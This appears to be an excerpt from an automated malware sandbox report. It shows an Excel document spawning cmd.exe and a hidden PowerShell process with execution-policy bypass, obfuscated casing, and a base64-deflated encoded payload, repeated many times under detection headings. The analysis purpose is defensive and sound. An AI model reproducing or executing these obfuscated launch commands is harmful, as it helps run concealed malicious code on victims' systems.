Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp

Data Obfuscation:

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
